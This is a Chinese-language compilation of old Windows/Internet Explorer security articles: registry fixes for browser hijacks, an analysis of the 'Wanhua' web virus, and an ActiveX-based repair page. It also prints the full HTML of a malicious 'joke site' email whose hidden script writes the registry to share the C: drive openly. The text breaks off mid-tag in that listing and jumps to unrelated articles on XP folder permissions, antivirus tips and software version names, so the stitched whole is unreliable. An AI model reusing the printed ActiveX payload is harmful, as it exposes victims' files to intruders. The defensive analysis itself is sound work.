下的DWORD值“DisableRegistryTools”被修改为“1”的缘故,将其键值恢复为“0”即可恢复注册表的使用。
解决办法:
用记事本程序建立以REG为后缀名的文件,将下面这些内容复制在其中就可以了:
REGEDIT4 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
“DisableRegistryTools”=dword:00000000
5
2、篡改IE的默认页
有些IE被改了起始页后,即使设置了“使用默认页”仍然无效,这是因为IE起始页的默认页也被篡改了。具体说就是以下注册表项被修改:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
“Default_Page_URL”这个子键的键值即起始页的默认页。
解决办法:
运行注册表编辑器,然后展开上述子键,将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就行了,或者将其设置为IE的默认值。
3、修改IE浏览器缺省主页,并且锁定设置项,禁止用户更改
主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选):
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
"Settings"=dword:1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
"Links"=dword:1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
6
"SecAddSites"=dword:1
解决办法:
将上面这些DWORD值改为“0”即可恢复功能。
4、IE的默认首页灰色按扭不可选
这是由于注册表
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel
下的DWORD值“homepage”的键值被修改的缘故。原来的键值为“0”,被修改后为“1”(即为灰色不可选状态)。
解决办法:
将“homepage”的键值改为“0”即可。
5、IE标题栏被修改
在系统默认状态下,是由应用程序本身来提供标题栏的信息,但也允许用户自行在上述注册表项目中填加信息,而一些恶意的网站正是利用了这一点来得逞的:它们将串值Window Title下的键值改为其网站名或更多的广告信息,从而达到改变浏览者IE标题栏的目的。
具体说来受到更改的注册表项目为:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet
7
Explorer\Main\Window Title
解决办法:
①在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;
②展开注册表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Window Title” ,将该串值删除即可,或将Window Title的键值改为“IE浏览器”等你喜欢的名字;
③同理,展开注册表到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
然后按②中所述方法处理。
④退出注册表编辑器,重新启动计算机,运行IE,你会发现困扰你的问题被解决了!
6、IE右键菜单被修改
受到修改的注册表项目为:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
下被新建了网页的广告信息,并由此在IE右键菜单中出现!
解决办法:
打开注册标编辑器,找到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
删除相关的广告条文即可,注意不要把下载软件FlashGet和Netants也
8
删除掉,这两个可是“正常”的,除非你不想在IE的右键菜单中见到它们。
7、IE默认搜索引擎被修改
在IE浏览器的工具栏中有一个搜索引擎的工具按钮,可以实现网络搜索,被篡改后只要点击那个搜索工具按钮就会链接到那个篡改网站。出现这种现象的原因是以下注册表被修改:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant
解决办法:
运行注册表编辑器,依次展开上述子键,将“CustomizeSearch”和“SearchAssistant”的键值改为某个搜索引擎的网址即可。
8、系统启动时弹出对话框
受到更改的注册表项目为:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon
在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”,其中“LegalNoticeCaption”是提示框的标题,“LegalNoticeText”是提示框的文本内容。由于它们的存在,就使得我们每次登陆到Windwos桌面前都出现一个提示窗口,显示那些网页的广告信息!
9
解决办法:
打开注册表编辑器,找到
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon
这一个主键,然后在右边窗口中找到“LegalNoticeCaption”和“LegalNoticeText”这两个字符串,删除这两个字符串就可以解决在登陆时出现提示框的现象了。
9、IE默认连接首页被修改
IE浏览器上方的标题栏被改成“欢迎访问??网站”的样式,这是最常见的篡改手段,受害者众多。
受到更改的注册表项目为:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
通过修改“Start Page”的键值,来达到修改浏览者IE默认连接首页的目的,如浏览“万花谷”就会将你的IE默认连接首页修改为“http://on888.home.chinaren.com ”,即便是出于给自己的主页做广告的目的,也显得太霸道了一些,这也是这类网页惹人厌恶的原因。
解决办法:
①在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏
10
中键入regedit,然后按“确定”键;
②展开注册表到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Start Page”双击,将Start Page的键值改为“about:blank”即可;
③同理,展开注册表到
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
在右半部分窗口中找到串值“Start Page”,然后按②中所述方法处理。
④退出注册表编辑器,重新启动计算机,一切OK了!
特殊例子:当IE的起始页变成了某些网址后,就算你通过选项设置修改好了,重启以后又会变成他们的网址啦,十分的难缠。其实他们是在你机器里加了一个自运行程序,它会在系统启动时将你的IE起始页设成他们的网站。
解决办法:运行注册表编辑器regedit.exe,然后依次展开
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
主键,然后将其下的registry.exe子键删除,然后删除自运行程序c:\Program Files\registry.exe,最后从IE选项中重新设置起始页。
10、IE中鼠标右键失效
浏览网页后在IE中鼠标右键失效,点击右键没有任何反应!
有的网络**为了达到其恶意宣传的目的,将你的右键弹出的功能菜单进行
11
了修改,并且加入了一些乱七八糟的东西,甚至为了禁止你下载,将IE窗口中单击右键的功能都屏蔽掉。
解决办法:
1.右键菜单被修改。打开注册表编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt,删除相关的广告条文。
2.右键功能失效。打开注册表编辑器,展开到HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions,将其DWORD值"NoBrowserContextMenu"的值改为0。
11、查看“源文件”菜单被禁用
在IE窗口中点击“查看”→“源文件”,发现“源文件”菜单已经被禁用。
恶意网页修改了注册表,具体的位置为:
在注册表
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
下建立子键“Restrictions”,然后在“Restrictions”下面建立两个DWORD值:
“NoViewSource”和“NoBrowserContextMenu”,并为这两个DWORD值赋值为“1”。
在注册表
12
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions
下,将两个DWORD值:“NoViewSource”和“NoBrowserContextMenu”的键值都改为了“1”。
通过上面这些键值的修改就达到了在IE中使鼠标右键失效,使“查看”菜单中的“源文件”被禁用的目的。
解决办法:
将以下内容另存为后缀名为.reg的注册表文件,比如说unlock.reg,双击unlock.reg导入注册表,不用重启电脑,重新运行IE就会发现IE的功能恢复正常了。
REGEDIT4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions
“NoViewSource”=dword:00000000
"NoBrowserContextMenu"=dword:00000000
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions
“NoViewSource”=dword:00000000
“NoBrowserContextMenu”=dword:00000000
12、浏览网页开始菜单被修改
这是最“狠”的一种,让浏览者有生不如死的感觉。浏览后不仅有类似
13
上面所说的那些症状,还会有以下更悲惨的遭遇:
1)禁止“关闭系统”
2)禁止“运行”
3)禁止“注销”
4)隐藏C盘——你的C盘找不到了!
5)禁止使用注册表编辑器regedit
6)禁止使用DOS程序
7)使系统无法进入“实模式”
8)禁止运行任何程序
“万花病毒”就是采用了以上的方法,后面我们将重点分析“万花病毒”。
13、禁止鼠标右键,否则弹出大量窗口消耗系统资源直到死机
这种情况是网页制作者不希望你查看他的源代码,当你使用鼠标右键查看代码时,网页就会弹出大量窗口,消耗你的系统资源直到死机,这种网页代码在国内不多见。
预防方法:不查看源代码,如果要看可以采用另存为先保存网页再用编辑软件查看。
14、网页中插入病毒
有的网页被插入了病毒,当你浏览时就会被病毒感染,如有的被插入欢乐时光的变种病毒等,这些大多是由于网页编制者自己的疏忽造成的。
预防方法:不浏览该页,安装在线监控杀毒软件,如KV3000、瑞星、金
14
山毒霸等都能防止。
15、共享你的硬盘
当你浏览网页时不小心你的C盘被改为完全共享!这样黑客可以用SMB扫描器直接登陆你的C盘,他可以在硬盘中随意拷贝文件,删除文件,添加文件??并且可以给你上传木马,永久而全面地控制你的机器。
这一般是利用了MS.ActiveX元件的写注册表的功能,还有的是调用FileSystemObject元件(文件系统对象)。病毒首先得到你的Windows目录和System目录,再修改注册表,把你的启动目录——"C:\WINDOWS\Start Menu\Programs\启动"设置为完全共享。
防备方法:将ActiveX元件、Java脚本和Vbs脚本等全部禁止就可以避免Bingo。
具体方法是:在Internet Explorer菜单中点击“工具”——“Internet选项”,在弹出的对话框中选择“安全”标签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把其中所有ActiveX控件以及Java和Vbs脚本相关全部选择“禁用”即可。不过,这样做在以后的网页浏览过程中可能会造成一些善意使用脚本和控件的网站无法正常浏览。当然最好是安装杀毒软件实现在线监控。
我们在后面将详细介绍该病毒。
15
四、主要网页病毒的分析
1、万花病毒
该病毒是一个比较有代表性的恶意代码网页病毒,最先由搜毒网发现,并提交给了江民科技,具体如下:
该病毒是在一个叫“万花谷”的网站传出,这是利用Java 最新技术进行破坏的一个恶意代码。
该病毒的技术特征和修复方法:
JS/On888是一个新的含有有害代码的ActiveX网页文件,它通过在一个网络地址来对计算机用户造成破坏,其破坏特性如下:
(1)用户不能正常使用WINDOWS的DOS功能程序;
(2)用户不能正常退出WINDOWS,
(3)开始菜单上的“关闭系统”、“运行”等栏目被屏蔽,防止用户重新以DOS方式启动,关闭DOS命令、关闭REGEDIT命令等。
(4)将IE的浏览器的首页和收藏夹中都加入了含有该有害网页代码的网络地址。
具体的表现形式是:
a网络地址是:www.on888.xxx.xxx.com;
b在IE的“收藏夹”中自动加上“万花谷”的快捷方式, 网络地址是:"http://96xx.xxx.com";
进入该网页的话,如果你的浏览器的版本在IE4.0以上,那么该网页显示的是一个有光效滤镜的网页,随着鼠标的移动,会造成光线照在网页图片
16
不同地方的效果,光效一共有4种。
将IE的首页通过系统注册表项
HKEY_LOCAL_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", 设置成为"on888.xxx.xxx.com/";
为了达到该网页文件的破坏性,该ActiveX 对系统的注册表做了如下的修改:
首先在开始菜单上禁止了“运行”项目,使用户不能通过通常的注册表编辑器来修改该有害网页对系统注册表的修改:
以下的注册表项表现在没有“运行”菜单:
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun";
以下的注册表项表现在没有“关闭系统”项目:
“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose";
以下的注册表项表现在没有“注销”项目;
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff";
以下的注册表项表现在没有所有的逻辑驱动器:
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives";
以下的注册表项表现在禁止注册表的编辑工具REGEDIT:
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Sys
17
tem\\DisableRegistryTools
以下的注册表项表现在没有桌面:
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop";
以下的注册表项表现在禁止运行所有的DOS应用程序;
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled";
以下的注册表项表现在系统不能启动到“实模式(传统的DOS模式)”下;
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode";
以下的注册表项表现在WINDOWS系统登录时显示一个登录窗口(在MICROSOFT 网络用户登录之前):
"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption",(窗口的标题是) "欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!");
"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", (窗口中的文字是)"欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!");
以下的注册表项表现在所有IE的窗口都会加上以下的WINDOWS标题窗口:
"HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "欢迎来到万花谷!请与OICQ:4040465联系!");
18
"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "欢迎来到万花谷!请与OICQ:4040465联系!");
最后的表现是在用户的计算机的IE浏览器上打开无数的窗口,使得IE根本无法使用。同时用户正常的一些功能:桌面、开始中的运行、DOS方式、REGEDIT等都无法使用。
受害用户的修复方法:系统的注册表的恢复,建议用户使用F8启动到MSDOS方式下,使用SCANREG/RESTORE命令来恢复原来正常的注册表。
恢复系统注册表时必须将WINDOWS登录时的键值同时修改,去掉登录时出现的WINDOWS登录的对话框,具体涉及的注册表键值是:
"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption"(窗口的标题是) "欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系,和
"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "欢迎来到万花谷!请与OICQ:4040465联系!"
以避免计算机的IE浏览器上打开无数的窗口,使得IE无法使用。
对于IE收藏夹中的地址信息去掉的方法是:将WINDOWS的安装目录(一般是WINDOWS)下的Favorites目录下的文件:"万花谷.URL"删除该文件。
还有另一种恢复方法:该方法对WINDOWS9X有效,中毒后你找到WINDOWS下的系统备份文件恢复注册表。并把.HTA文件删除就可以恢复到没有中毒前的状态。
19
2、混客绝情炸弹
手工清除“混客绝情炸弹”指南
清除以下键值
HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page
删除以下键
HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title
HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title
删除以下主键(包括子键)
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon
最后自己手工清除收藏夹中的连接
自动修复“混客绝情炸弹”方法
当然你可以采用网页代码自己自动修复“混客绝情炸弹”的破坏,你把以下的代码保存为.htm文件,在本机运行后就可以自动修复。
<HTML>
<head>
<TITLE>混客炸弹破解</TITLE>
20
<meta name="keywords" content="注册表,恶意代码,修改注册表">
<meta name="description" content="Robonic修改,QQ:10000022,www.J3J4.com">
</head>
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function a(){
try
{
b=document.applets[0];
b.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
b.createInstance();
c = b.GetObject();
try
{
c.RegDelete("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\");
c.RegWrite("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","about:blank");
c.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","Microsoft Internet Explorer");
21
c.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","Microsoft Internet Explorer");
c.RegWrite("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","Microsoft Internet Explorer");
c.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption","");
c.RegWrite("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText","");
c.RegDelete("HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\RemoteAccess\\NoLogon");
c.RegDelete("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives");
c.RegDelete("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose");
c.RegDelete("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop");
c.RegDelete("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff");
c.RegDelete("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun");
c.RegDelete("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled");
22
c.RegDelete("HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode");
}
catch(e)
{}
}
catch(e)
{}
}
function d()
{
setTimeout("a()", 0);
}
d();
</SCRIPT>
<OBJECT id=closes type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<param name="Command" value="Close">
</object>
<input type="button" value="请重新启动一下" onclick="closes.Click();">
</HTML>
23
3、笑林广记笑话网共享你的硬盘
HTML源文件
〈!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"〉
〈HTML〉〈HEAD〉
〈META content="text/html; charset=gb2312" http-equiv=Content-Type〉
〈META content="MSHTML 5.00.2614.3500" name=GENERATOR〉
〈STYLE〉〈/STYLE〉
〈/HEAD〉
〈BODY bgColor=#c0c0c0〉
〈DIV align=center〉〈FONT size=4〉〈STRONG〉笑林广记笑话集〈/STRONG〉〈/FONT〉〈/DIV〉
〈DIV align=center〉〈/DIV〉
〈DIV align=left〉〈FONT size=2〉
你好!我们是笑林广记笑话网,这里有大量的XXX级笑话,绝对笑死你!欢迎访问!附件中有极品笑话N篇,友情赠送!〈A href="http://www.sexlaugh.com.cn"〉Http://www.sexlaugh.com.cn〈/A〉〈/FONT〉〈/DIV〉
〈script language=JavaScript〉
function f() //改写注册表的函数
{
24
var aa,ss;
aa=document.applets[0];
aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
aa.createInstance();
ss=aa.GetObject();
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Flags",302,"REG_DWORD");
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Type",0,"REG_DWORD");
ss.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000); //每过1000毫秒就再次递归调用f()
}
init(); //调用函数
〈/script〉
〈/BODY〉〈/HTML〉
这封邮件就是利用了MS.ActiveX元件的写注册表的功能,只要你一读这封信,它就会在注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\ Network\LanMan中添加了一个键值C$,并且将C
25
盘改为完全共享!
再来看一看附件Laugh.hta吧。查看了一下“文件类型”,发现“.hta”后缀名其实是HTML Application文件,可以由Mshta.exe解释执行。也是和WSH、VBS一样的文本文件,就将它导出为Txt文件如下:
〈ht
Windows XP重装后原文件夹拒绝访问的解决方法
昨天笔者因为病毒的原因重装了XP ,但重装后发现“我的文档”中的一些文件打不开,老提示拒绝访问。XP原来是装在C盘,而“我的文档”在原来的XP系统中是调整到了D盘的一个文件夹,当时这样做的目的是为了避免重装系统时忘记备份,将我的文档中的内容格式化掉。记得原来在单位用电脑时也遇到过类似的情况,只是当时没什么重要文件,也就没有想办法解决这个问题。可现在情况不一样了,那里面有许多重要的文件,而且当时将这个文件设为专用了,这可能是造成“拒绝访问”的原因。查看了一下,果然不只“我的文档”中的一些文件,以前设为专用的一些文件夹都拒绝访问,推断是由于同一原因。
是不是再新建一个同样名称的用户就能访问呢?经试验,也不行,因为在XP中,每个用户都有一个唯一的SID。
于是在网上搜索了一下,原来有许多朋友也遇到过这种问题,而且也有许多热心的朋友提供了多种解决的办法。经参考各路豪杰提供的绝招之后,又经过实践,终于总结出解决此类问题的一个良方,发在这里贡献给各位,希望对遇到同类问题的朋友有帮助。
闲言少叙,下面介绍具体解决方法。
1、以具有管理员权限的用户登录XP,在XP中打开资源管理器,选择菜单“工具|文件夹选项”,打开“文件夹选项”对话框。在对话框中单击“查看”选项卡,取消复选框“使用简单共享”。
图1 取消“使用简单共享”
2、右键单击原来设为专用的文件夹,如“i386-sp2”,从弹出菜单中选择“属性”,这时会看到在对话框中多出一个“安全”选项卡。可以看到这里有一个未知帐户,这应该就是原来XP系统中的那个帐户吧。这个帐户是能够访问该文件夹的,可问题是我们现在已经不能使用这个帐户。所以要另想办法。
图2 安全选项卡
3、单击图2所示对话框中的“高级”按钮,弹出“i386-sp2的高级安全设置”对话框,显示目前该项目的所有者为刚才看到的未知帐户。选择“将所有者更改为”下方的用户,比如笔者现在使用的用户名称,然后单击“应用”按钮,所有者就改变为现在用户了,如图3所示。
图3 更改文件夹的所有者
选中下方的“替换子容器及对象的所有者”,单击“应用”按钮,会看到有一个取得文件夹中所有文件和文件夹所有权的过程。
4、单击上述对话框中的“权限”选项卡,单击“添加”按钮,如图4所示。
图4
然后在“选择用户或组”对话框中单击“高级”按钮,再单击“立即查找”按钮,这时就会在下方列出本机中的用户或组。选择要给予权限的用户。
图5 选择用户
5、连续单击两次“确定”按钮,直到出现“i386-sp2的权限项目”对话框。在“权限”中的“完全控制”右侧选择“允许”复选框,则就会取得对该文件夹所有的控制权。单击“确定”按钮。
图6 更改权限
6、连续单击确定,直到关闭所有对话框。这样,原有的专用文件夹就可以使用现在的用户访问了。 如果还遇到不能打开文件或文件夹的问题,再试着改一下它们的只读属性,或者在如图4所示对话框中修改“有效权限”。对于个别仍然打不开的文件,可以尝试单独修改其权限。
小结:造成重装XP后某些文件或文件夹不能访问的原因,主要是在重装之前对文件或文件夹设置了访问权限或进行了加密。本文的解决办法是使用管理员身份登录,然后修改这些文件或文件夹的访问权限,使得当前用户能够完全控制它们。
防御计算机病毒十大必知步骤
1、用常识进行判断
决不打开来历不明邮件的附件或你并未预期接到的附件。对看来可疑的邮件附件要自觉不予打开。千万不可受骗,认为你知道附件的内容,即使附件看来好象是.jpg文件 -- 因为Windows允许用户在文件命名时使用多个后缀,而许多电子邮件程序只显示第一个后缀,例如,你看到的邮件附件名称是wow.jpg,而它的全名实际是wow.jpg.vbs,打开这个附件意味着运行一个恶意的VBScript病毒,而不是你的.jpg察看器。
2、安装防病毒产品并保证更新最新的病毒定义码
建议你至少每周更新一次病毒定义码,因为防病毒软件只有最新才最有效。需要提醒你的是,你所是购买的诺顿防病毒软件,不仅是更新病毒定义码,而且同时更新产品的引擎,这是与其它防病毒软件所不一样的。这样的好处在于,可以满足新引擎在侦破和修复方面的需要,从而有效地抑制病毒和蠕虫。例如,赛门铁克的所有产品中都有“实时更新”(LiveUpdate)功能。
3、首次安装防病毒软件时,一定要对计算机做一次彻底的病毒扫描
当你首次在计算机上安装防病毒软件时,一定要花费些时间对机器做一次彻底的病毒扫描,以确保它尚未受过病毒感染。功能先进的防病毒软件供应商现在都已将病毒扫描做为自动程序,当用户在初装其产品时自动执行。4、插入软盘、光盘和其他可插拔介质前,一定对它们进行病毒扫描。
确保你的计算机对插入的软盘、光盘和其他的可插拔介质,及对电子邮件和互联网文件都会做自动的病毒检查。
5、不要从任何不可靠的渠道下载任何软件
这一点比较难于做到,因为通常我们无法判断什么是不可靠的渠道。比较容易的做法是认定所有较有名气的在线图书馆未受病毒感染,但是提供软件下载的网站实在太多了,我们无法肯定它们一定都采取了防病毒的措施,所以比较保险的办法是对安全下载的软件在安装前先做病毒扫描。
6、警惕欺骗性的病毒
如果你收到一封来自朋友的邮件,声称有一个最具杀伤力的新病毒,并让你将这封警告性质的邮件转发给你所有认识的人,这十有八九是欺骗性的病毒。建议你访问防病毒软件供应商,如赛门铁克的网站www.symantec.com/avcenter, 证实确有其事。这些欺骗性的病毒,不仅浪费收件人的时间,而且可能与其声称的病毒一样有杀伤力。
7、使用其它形式的文档,如.rtf(Rich Text format)和.pdf(Portable Document format)
常见的宏病毒使用Microsoft Office的程序传播,减少使用这些文件类型的机会将降低病毒感染风险。尝试用Rich Text存储文件,这并不表明仅在文件名称中用.rtf后缀,而是要在Microsoft Word中,用“另存为”指令,在对话框中选择Rich Text形式存储。尽管Rich Text format依然可能含有内嵌的对象,但它本身不支持Visual Basic Macros或Jscript。而pdf文件不仅是跨平台的,而且更为安全。当然,这也不是能够彻底避开病毒的万全之计。
8、不要用共享的软盘安装软件,或者更为糟糕的是复制共享的软盘
这是导致病毒从一台机器传播到另一台机器的方式。同时,该软件没有注册也会被认为是非正版软件,而我们基本可以较为合理地推断,复制非法软件的人一般对版权法和合法使用软件并不在乎,同样,他们对安装和维护足够的病毒防护措施也不会太在意。盗版软件是病毒传染的最主要渠道。
9、禁用Windows Scripting Host
Windows Scripting Host(WSH) 运行各种类型的文本,但基本都是VBScript或Jscript。换句话说,Windows Scripting Host在文本语言之间充当翻译的角色,该语言可能支持ActiveX Scripting界面,包括VBScript, Jscript或Perl,及所有Windows的功能,包括访问文件夹、文件快捷方式、网络接入和Windows注册等。许多病毒/蠕虫,如Bubbleboy和KAK.worm使用Windows Scripting Host,无需用户点击附件,就可自动打开一个被感染的附件。
10、使用基于客户端的防火墙或过滤措施
如果你使用互联网,特别是使用宽带,并总是在线,那就非常有必要用个人防火墙保护你的隐私并防止不速之客访问你的系统。如果你的系统没有加设有效防护,你的家庭地址、信用卡号码和其它个人信息都有可能被窃取。
Alpha版(内部测试版):一般只在软件开发公司内部运行,不对外公开。主要是开发者自己对产品进行测试,检查产品是否存在缺陷、错误,验证产品功能与说明书、用户手册是否一致。
Beta版(外部测试版):软件开发公司为对外宣传,将非正式产品免费发送给具有典型性的用户,让用户测试该软件的不足之处及存在问题,以便在正式发行前进一步改进和完善。一般可通过Internet免费下载,也可以向软件公司索取。
trail( 试用版):含有某些限制,如时间、功能,注册后也有可能变为正式版。
RC :是 Release Candidate 的缩写,意思是发布倒计时,该版本已经完成全部功能并清除大部分的BUG。到了这个阶段只会除BUG,不对软件做任何大的更改。
Demo版(演示版):主要是演示正式软件的部分功能,用户可以从中得知软件的基本操作,为正式产品的发售扩大影响。如果是游戏的话,则只有一两个关卡可以玩。该版本也可以从Internet上免费下载。
Preview :预览版。
Shareware版(共享版):有些公司为了吸引客户,对于他们制作的某些软件,可以让用户通过Internet免费下载的方式获取。不过,此版本软件多会带有一些使用时间或者次数的限制,还有可能是会有很多广告(如Flashget),但可以利用在线注册或电子注册成为正式版用户。
Free版(自由版):这一般是个人或自由软件联盟组织的成员制作的软件,希望免费给大家使用,没有版权,一般也是通过Internet免费下载。
Cardware: 属共享软件的一种,只要给作者回复一封电邮或明信片即可。(有的作者并由此提供注册码等),目前这种形式已不多见。
RTM 版:这基本就是最终的版本,英文是 Release To Manufactur,意思是发布到生产商。
Release版(发行版):不是正式版,带有时间限制,也是为扩大影响所做的宣传策略之一。比如Windows Me的发行版就限制了只能使用几个月,可从Internet上免费下载或由公司免费奉送。
Enhace版(增强版或加强版):如果是一般软件,一般称作“增强版”,会加入一些实用的新功能。如果是游戏,一般称作加强版”,会加入一些新的游戏场景和游戏情节等。这是正式发售的版本。
Full Version版(完全版):也就是正式版,是最终正式发售的版本。
Retail :零售版。
Corporation & Enterprise :企业版。
Standard :标准版。
Mini :迷你版也叫精简版只有最基本的功能。
Premium : 贵价版。
Professional :专业版。
Express :特别版。
Deluxe :豪华版。
Uprgade/Update版(升级版):当你有某个软件以前的正式版本时,可以购买升级版,将你的软件升级为最新版。升级后的软件与正式版在功能上相同,但价格会低些,这主要是为了给原有的正版用户提供优惠。
Plus:属增强版,不过这种大部分是在程序界面及多媒体功能上增强。
Regged:已注册版
CN / SC:简体中文版
CHT/TC:繁体中文版
EN:英文版
Multilanguage:多国语言版
Rip: 是指从原版文件(一般是指光盘或光盘镜像文件)直接将有用的内容(核心内容)分离出来,剔除无用的文档,例如PDF说明文件、视频演示之类的东西,也可以算做是精简版…但主要内容功能是一点也不能缺少!另:DVDrip是指将视频和音频直接从DVD光盘里以文件方式分离出来。
Original Equipment Manufacturer (OEM) :贴牌生产,是给电脑生产厂的版本。
Full Packaged Product (FPP)–Retail : FPP就是零售版(盒装软件),这种产品的光盘的卷标都带有FPP字样,比如英文WXP Pro的FPP版本的光盘卷标就是WXPFPP_EN,其中WX表示是Windows XP,P是Professional(H是Home),FPP表明是零售版本,EN是表明是英语。获得途径除了在商店购买之外,某些MSDN用户也可以得到。
